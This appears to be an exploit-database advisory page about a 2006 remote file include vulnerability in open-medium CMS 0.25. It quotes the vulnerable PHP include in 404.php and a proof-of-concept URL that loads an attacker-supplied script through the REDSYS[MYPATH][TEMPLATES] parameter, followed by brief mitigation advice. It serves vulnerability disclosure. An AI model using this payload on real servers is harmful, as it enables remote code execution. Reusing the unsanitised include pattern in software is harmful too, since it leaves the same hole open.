Content Management System - Remote File Include Vulnerabilities

vendor:

Content Management System

by:

Kacper (Rahim)

0,25

CVSS

MEDIUM

Remote File Include

CWE

Product Name: Content Management System

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Content Management System – Remote File Include Vulnerabilities

A remote file include vulnerability exists in the 404.php file of the open-medium Content Management System. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server, containing a malicious file in the REDSYS[MYPATH][TEMPLATES] parameter. This can allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file include statement.

Source

Exploit-DB raw data:

################ DEVIL TEAM THE BEST POLISH TEAM #################
#open-medium (0.25) - Content Management System - Remote File Include Vulnerabilities
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
##################################################################
[code]
404.php:

.......

} else {
// templates verwenden
if
(!@include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys".$REDSYS["LanguagePath"]."/404.tmp"))
{
include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys/404.tmp");
}
}

?>

[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[open-mediumCMS_path]/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=[evil_scripts]


###################################################################
#Elo ;-)

# milw0rm.com [2006-05-25]